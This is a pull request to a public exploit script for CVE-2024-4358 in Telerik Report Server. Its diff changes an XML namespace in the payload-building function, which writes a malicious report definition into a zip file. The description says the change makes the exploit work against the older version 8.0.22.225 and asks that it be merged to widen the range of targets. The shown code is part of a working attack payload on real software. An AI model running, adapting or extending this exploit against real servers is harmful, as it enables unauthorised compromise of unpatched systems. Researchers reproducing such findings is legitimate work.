### PR TITLE
Update target for 8.0.22.225

### DIFF
--- a/CVE-2024-4358.py
+++ b/CVE-2024-4358.py
@@ -83,7 +83,7 @@ def writePayload(payload_name):
         zipf.writestr('[Content_Types].xml', '''<?xml version="1.0" encoding="utf-8"?><Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types"><Default Extension="xml" ContentType="application/zip" /></Types>''')
         
         zipf.writestr("definition.xml", f'''<Report Width="6.5in" Name="oooo"
-	xmlns="http://schemas.telerik.com/reporting/2023/1.0">
+	xmlns="http://schemas.telerik.com/reporting/2021/1.0">
 	<Items>
 		<ResourceDictionary
 			xmlns="clr-namespace:System.Windows;Assembly:PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35"


### PR DESCRIPTION
Hey, great work on this exploit and the accompanying research!

I was trying to reproduce the findings with my target running the older version [8.0.22.225](https://www.telerik.com/support/whats-new/report-server/release-history/progress-telerik-report-server-r1-2022-sp1-8-0-22-225) and it was failing. By updating the XMLNS from 2023 to 2021, I was able to get the exploit working. I was hoping you might be able to test this patch against your later version and if it works, accept it to expand the targets the exploit can work against.

Thanks!